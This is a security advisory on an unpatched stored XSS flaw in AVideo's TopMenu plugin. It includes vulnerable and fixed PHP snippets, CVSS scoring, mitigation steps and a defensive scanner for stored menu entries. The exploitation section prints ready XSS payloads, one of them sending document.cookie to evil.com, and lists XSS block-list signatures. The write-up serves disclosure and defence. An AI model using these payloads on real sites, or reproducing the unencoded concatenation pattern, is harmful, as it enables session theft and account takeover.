Apr 2, 2026
A stored XSS flaw in AVideo's TopMenu plugin allows injected JavaScript to execute on every public page, potentially leading to widespread account takeover. The vulnerability is currently unpatched.
The TopMenu plugin in AVideo up to version 26.0 contains a stored cross-site scripting (XSS) vulnerability. User-controlled menu fields lack proper output encoding, allowing administrative users to inject malicious JavaScript that executes globally across all public-facing pages.
The AVideo platform, formerly known as YouPHPTube, is an open-source video sharing and streaming application. The TopMenu plugin extends the platform's user interface by allowing administrators to configure custom navigation bars. These navigation elements are injected into all public-facing pages via global plugin hooks.
GHSA-GMPC-FXG2-VCMQ details a stored cross-site scripting (XSS) vulnerability within this plugin. The flaw originates from the insecure rendering of user-controlled menu item properties. Because the plugin processes these values without sanitization, malicious payloads are embedded directly into the Document Object Model (DOM) of the application.
The vulnerability exposes all site visitors to client-side attacks. Any user navigating to a page where the TopMenu hook is active will execute the stored payload. This creates a persistent, high-exposure attack surface that affects unauthenticated visitors and authenticated administrators alike.
The core of this vulnerability is the complete absence of output encoding during HTML generation. The TopMenu plugin constructs the navigation menu by querying configured items from the database. The retrieved data structures include properties for the menu text label, the destination URL, and the CSS classes used for rendering icons.
When iterating over these database records, the PHP backend concatenates the raw string values directly into HTML tags. Standard security practices require passing user-controlled strings through functions like htmlspecialchars() before inclusion in the HTML response. The failure to apply HTML entity encoding allows arbitrary characters, including angle brackets and quote marks, to break out of their intended attribute contexts.
For example, an attacker can input a string containing a closing quote and a closing bracket into the icon class field. The resulting server response will prematurely terminate the icon tag and begin rendering subsequent attacker-supplied tags. This mechanism enables the introduction of arbitrary <script> elements or inline event handlers directly into the page source.
The vulnerability manifests during the HTML generation routine of the TopMenu plugin. While no official patch is currently available, analyzing the rendering logic highlights the exact failure point. The plugin retrieves menu configuration objects and directly injects their properties into anchor tags.
The vulnerable implementation takes the href attribute, the class attribute, and the inner text directly from the stored object.
```php
<?php
// Conceptual vulnerable implementation: every stored menu field is
// concatenated into the markup exactly as it was saved.
$html = '';
$iconClass = $menuItem->iconClass; // e.g. "fa fa-home"
$url       = $menuItem->url;
$label     = $menuItem->label;
// Direct concatenation without output encoding
$html .= "<a href=\"" . $url . "\">";
$html .= "<i class=\"" . $iconClass . "\"></i> ";
$html .= $label;
$html .= "</a>";
```

A secure implementation requires explicit, context-aware output encoding. The htmlspecialchars() function must be applied with the ENT_QUOTES flag so that both single and double quotes are escaped.
```php
<?php
// Conceptual secure implementation: each field is HTML-entity encoded for
// the context it lands in (attribute value or text node) before concatenation.
$html = '';
$html .= "<a href=\"" . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . "\">";
$html .= "<i class=\"" . htmlspecialchars($iconClass, ENT_QUOTES, 'UTF-8') . "\"></i> ";
$html .= htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
$html .= "</a>";
```

Exploitation requires the attacker to be able to modify the TopMenu plugin configuration, which is normally restricted to administrative users. However, an unauthenticated attacker can satisfy this prerequisite by leveraging Cross-Site Request Forgery (CSRF) or by obtaining administrative credentials through other vectors.
Once access is secured, the attacker navigates to the plugin's configuration interface and injects specific XSS payloads into the vulnerable fields. A payload targeting the icon class field uses "><script>alert(document.cookie)</script> to break out of the class attribute. A payload in the text label field uses "><img src=x onerror=fetch('https://evil.com/?cookie='+document.cookie)> to execute JavaScript upon image load failure.
The persistence mechanism guarantees that the payload remains active until manually removed from the database. When any user requests a page on the AVideo instance, the TopMenu plugin retrieves the configuration and serves the malicious DOM. The payload executes automatically in the victim's browser context without requiring further interaction.
The CVSS 3.1 base score for this vulnerability is 6.1 (Medium), characterized by the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. The 'Privileges Required' metric is categorized as None because the ultimate victims of the vulnerability do not need privileges to trigger the execution phase. The 'Scope' metric is Changed, reflecting that the server-side vulnerability directly impacts the client-side environment.
The primary consequence of this vulnerability is the exposure of active session tokens. Attackers can write JavaScript payloads that read document.cookie and exfiltrate the data to an external listener. This leads directly to account takeover, allowing the attacker to impersonate legitimate users or administrators.
Furthermore, the global nature of the TopMenu plugin maximizes the attack surface. Because the navigation bar is rendered universally across the AVideo application, the payload achieves a 100% execution rate for all unique site visitors. This allows for rapid, automated credential harvesting and broad distribution of secondary client-side attacks, such as fake authentication overlays.
As of the publication date, no official patch has been released by the AVideo maintainers. Systems running AVideo up to and including version 26.0 remain vulnerable. Administrators must implement immediate operational workarounds to secure their deployments against this attack vector.
The most effective immediate mitigation is to disable the TopMenu plugin entirely via the AVideo plugin manager. Disabling the plugin prevents the vulnerable rendering logic from executing and eliminates the attack surface. Administrators should rely on default navigation structures until an updated, secure version of the plugin is provided.
For environments where disabling the plugin is not feasible, organizations must deploy strict Web Application Firewall (WAF) rules. These rules should inspect POST requests targeting the TopMenu configuration endpoints and block payloads containing common XSS signatures, such as <script>, onerror, and javascript:. Additionally, security teams should audit the database directly to identify and remove any unauthorized or suspicious menu configuration entries.
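As an added example for the database audit step above (not AVideo's code), the helper below scans stored menu entries for the signatures the text lists (script tags, event handlers, javascript: URLs) and, more generally, for any angle bracket or quote character, since a legitimate label, icon class or URL never needs one. The rows are constructed sample data standing in for a SELECT over the plugin's menu table; the column names label, iconClass and url are assumptions to be adapted to the real schema.

```php
<?php
// Added example (not AVideo's code): triage helper for auditing stored
// TopMenu configuration rows before removing suspicious entries.
declare(strict_types=1);

/** Patterns that should not occur in a legitimate label, icon class or URL. */
const SUSPICIOUS_PATTERNS = [
    'script_tag'    => '/<\s*script/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',
    'script_scheme' => '/^\s*(javascript|data|vbscript)\s*:/i',
    'angle_bracket' => '/[<>]/',
    'quote'         => '/["\']/',
];

/**
 * @param array<int, array<string,mixed>> $rows rows with id, label, iconClass, url
 * @return array<int, array{id:int, field:string, reason:string, value:string}>
 */
function findSuspiciousMenuEntries(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach (['label', 'iconClass', 'url'] as $field) {
            $value = (string) ($row[$field] ?? '');
            foreach (SUSPICIOUS_PATTERNS as $reason => $pattern) {
                if (preg_match($pattern, $value) === 1) {
                    $findings[] = [
                        'id'     => (int) $row['id'],
                        'field'  => $field,
                        'reason' => $reason,
                        'value'  => $value,
                    ];
                    break; // the most specific match is enough for triage
                }
            }
        }
    }
    return $findings;
}

// Constructed sample rows (not real AVideo data).
$rows = [
    ['id' => 1, 'label' => 'Home', 'iconClass' => 'fa fa-home',  'url' => '/'],
    ['id' => 2, 'label' => 'Live', 'iconClass' => 'fa fa-tower', 'url' => 'https://example.com/live'],
    ['id' => 3, 'label' => '"><img src=x onerror=alert(1)>', 'iconClass' => 'fa', 'url' => '/help'],
    ['id' => 4, 'label' => 'Help', 'iconClass' => 'fa', 'url' => 'javascript:alert(1)'],
];

foreach (findSuspiciousMenuEntries($rows) as $f) {
    printf("row %d  field %-9s  %-14s  %s\n", $f['id'], $f['field'], $f['reason'], $f['value']);
}
```

On the sample data this reports row 3 (label, event_handler) and row 4 (url, script_scheme) and stays silent on rows 1 and 2. Review each flagged row manually before deleting it, and re-run the audit after the plugin is re-enabled or updated.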
| Product | Affected Versions | Fixed Version |
|---|---|---|
| AVideo WWBN | <= 26.0 | Unpatched |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-79 |
| Attack Vector | Network (Stored XSS) |
| CVSS v3.1 Score | 6.1 |
| Impact | Session Hijacking, Phishing, Forced Actions |
| Exploit Status | Proof-of-Concept |
| Component | TopMenu Plugin |
| Fix Status | Unpatched |
CWE-79 (Improper Neutralization of Input During Web Page Generation): The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.